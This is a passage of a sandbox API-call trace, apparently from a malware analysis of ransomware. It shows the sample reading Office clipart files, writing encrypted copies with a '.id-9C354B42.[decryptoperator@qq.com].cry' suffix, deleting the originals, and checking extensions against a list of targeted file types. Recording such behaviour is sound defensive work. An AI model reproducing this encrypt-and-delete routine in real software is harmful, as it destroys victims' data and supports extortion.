lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1398, lpOverlapped=0x0) returned 1 [0051.523] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x13a0, lpOverlapped=0x0) returned 1 [0051.523] ReadFile (in: hFile=0x210, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.524] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.524] SetEndOfFile (hFile=0x1ac) returned 1 [0051.524] CloseHandle (hObject=0x1ac) returned 1 [0051.524] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.524] SetEndOfFile (hFile=0x210) returned 1 [0051.525] CloseHandle (hObject=0x210) returned 1 [0051.525] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.525] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif")) returned 1 [0051.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0051.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0051.525] lstrlenW (lpString=".doc") returned 4 [0051.525] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.525] lstrlenW (lpString=".docx") returned 5 [0051.525] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.525] lstrlenW (lpString=".pdf") returned 4 [0051.525] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.526] lstrlenW (lpString=".xls") returned 4 [0051.526] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.526] lstrlenW (lpString=".xlsx") returned 5 [0051.526] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.526] lstrlenW (lpString=".ppt") returned 4 [0051.526] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0051.526] lstrlenW (lpString=".zip") returned 4 [0051.526] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.526] lstrlenW (lpString=".rar") returned 4 [0051.526] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.526] lstrlenW (lpString=".bz2") returned 4 [0051.526] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.526] lstrlenW (lpString=".7z") returned 3 [0051.526] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0051.526] lstrlenW (lpString=".dbf") returned 4 [0051.526] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0051.526] lstrlenW (lpString=".1cd") returned 4 [0051.526] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0051.526] lstrlenW (lpString=".jpg") returned 4 [0051.526] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.528] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=4390) returned 1 [0051.528] CloseHandle (hObject=0x1f4) returned 1 [0051.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif")) returned 0x20 [0051.528] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0051.529] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.529] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0051.530] GetLastError () returned 0x0 [0051.530] ReadFile (in: hFile=0x1f4, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1126, lpOverlapped=0x0) returned 1 [0051.539] WriteFile (in: hFile=0x1c4, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1130, lpOverlapped=0x0) returned 1 [0051.540] ReadFile (in: hFile=0x1f4, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.540] WriteFile (in: hFile=0x1c4, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.541] SetEndOfFile (hFile=0x1c4) returned 1 [0051.541] CloseHandle (hObject=0x1c4) returned 1 [0051.541] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.541] SetEndOfFile (hFile=0x1f4) returned 1 [0051.542] CloseHandle (hObject=0x1f4) returned 1 [0051.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.542] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif")) returned 1 [0051.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0051.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0051.542] lstrlenW (lpString=".doc") returned 4 [0051.542] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.542] lstrlenW (lpString=".docx") returned 5 [0051.542] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.542] lstrlenW (lpString=".pdf") returned 4 [0051.542] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.542] lstrlenW (lpString=".xls") returned 4 [0051.542] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.542] lstrlenW (lpString=".xlsx") returned 5 [0051.542] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.542] lstrlenW (lpString=".ppt") returned 4 [0051.542] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0051.542] lstrlenW (lpString=".zip") returned 4 [0051.542] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.542] lstrlenW (lpString=".rar") returned 4 [0051.542] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.542] lstrlenW (lpString=".bz2") returned 4 [0051.542] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.543] lstrlenW (lpString=".7z") returned 3 [0051.543] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0051.543] lstrlenW (lpString=".dbf") returned 4 [0051.543] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0051.543] lstrlenW (lpString=".1cd") returned 4 [0051.543] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0051.543] lstrlenW (lpString=".jpg") returned 4 [0051.543] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.543] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=3966) returned 1 [0051.543] CloseHandle (hObject=0x1f4) returned 1 [0051.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 0x20 [0051.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0051.544] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.544] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0051.544] GetLastError () returned 0x0 [0051.544] ReadFile (in: hFile=0x1f4, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xf7e, lpOverlapped=0x0) returned 1 [0051.643] WriteFile (in: hFile=0x1c4, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xf80, lpOverlapped=0x0) returned 1 [0051.644] ReadFile (in: hFile=0x1f4, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.651] WriteFile (in: hFile=0x1c4, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.651] SetEndOfFile (hFile=0x1c4) returned 1 [0051.651] CloseHandle (hObject=0x1c4) returned 1 [0051.652] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.652] SetEndOfFile (hFile=0x1f4) returned 1 [0051.652] CloseHandle (hObject=0x1f4) returned 1 [0051.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.652] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 1 [0051.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0051.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0051.653] lstrlenW (lpString=".doc") returned 4 [0051.653] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.653] lstrlenW (lpString=".docx") returned 5 [0051.653] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.653] lstrlenW (lpString=".pdf") returned 4 [0051.653] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.653] lstrlenW (lpString=".xls") returned 4 [0051.653] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.653] lstrlenW (lpString=".xlsx") returned 5 [0051.653] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.653] lstrlenW (lpString=".ppt") returned 4 [0051.653] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0051.653] lstrlenW (lpString=".zip") returned 4 [0051.653] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.653] lstrlenW (lpString=".rar") returned 4 [0051.653] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.653] lstrlenW (lpString=".bz2") returned 4 [0051.653] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.653] lstrlenW (lpString=".7z") returned 3 [0051.653] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0051.653] lstrlenW (lpString=".dbf") returned 4 [0051.653] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0051.653] lstrlenW (lpString=".1cd") returned 4 [0051.653] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0051.654] lstrlenW (lpString=".jpg") returned 4 [0051.654] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.659] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=5684) returned 1 [0051.659] CloseHandle (hObject=0x1bc) returned 1 [0051.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf")) returned 0x20 [0051.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0051.660] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.660] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0051.660] GetLastError () returned 0x0 [0051.660] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1634, lpOverlapped=0x0) returned 1 [0051.697] WriteFile (in: hFile=0x1f4, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1640, lpOverlapped=0x0) returned 1 [0051.697] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.697] WriteFile (in: hFile=0x1f4, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.698] SetEndOfFile (hFile=0x1f4) returned 1 [0051.698] CloseHandle (hObject=0x1f4) returned 1 [0051.698] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.698] SetEndOfFile (hFile=0x1bc) returned 1 [0051.698] CloseHandle (hObject=0x1bc) returned 1 [0051.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.699] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf")) returned 1 [0051.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.699] lstrlenW (lpString=".doc") returned 4 [0051.699] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.699] lstrlenW (lpString=".docx") returned 5 [0051.699] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.699] lstrlenW (lpString=".pdf") returned 4 [0051.699] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.699] lstrlenW (lpString=".xls") returned 4 [0051.699] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.699] lstrlenW (lpString=".xlsx") returned 5 [0051.699] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.699] lstrlenW (lpString=".ppt") returned 4 [0051.699] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.699] lstrlenW (lpString=".zip") returned 4 [0051.699] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.699] lstrlenW (lpString=".rar") returned 4 [0051.699] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.699] lstrlenW (lpString=".bz2") returned 4 [0051.699] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.699] lstrlenW (lpString=".7z") returned 3 [0051.699] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.700] lstrlenW (lpString=".dbf") returned 4 [0051.700] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.700] lstrlenW (lpString=".1cd") returned 4 [0051.700] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0051.700] lstrlenW (lpString=".jpg") returned 4 [0051.700] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.222] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=10832) returned 1 [0052.222] CloseHandle (hObject=0x21c) returned 1 [0052.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf")) returned 0x20 [0052.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.223] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.223] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0052.223] GetLastError () returned 0x0 [0052.223] ReadFile (in: hFile=0x21c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x2a50, lpOverlapped=0x0) returned 1 [0052.414] WriteFile (in: hFile=0x1c0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x2a60, lpOverlapped=0x0) returned 1 [0052.415] ReadFile (in: hFile=0x21c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.415] WriteFile (in: hFile=0x1c0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.415] SetEndOfFile (hFile=0x1c0) returned 1 [0052.467] CloseHandle (hObject=0x1c0) returned 1 [0052.467] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.467] SetEndOfFile (hFile=0x21c) returned 1 [0052.468] CloseHandle (hObject=0x21c) returned 1 [0052.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.468] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf")) returned 1 [0052.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0052.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0052.485] lstrlenW (lpString=".doc") returned 4 [0052.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.485] lstrlenW (lpString=".docx") returned 5 [0052.485] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.485] lstrlenW (lpString=".pdf") returned 4 [0052.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.485] lstrlenW (lpString=".xls") returned 4 [0052.485] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.485] lstrlenW (lpString=".xlsx") returned 5 [0052.485] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.485] lstrlenW (lpString=".ppt") returned 4 [0052.485] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0052.488] lstrlenW (lpString=".zip") returned 4 [0052.488] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.488] lstrlenW (lpString=".rar") returned 4 [0052.488] lstrcmpiW 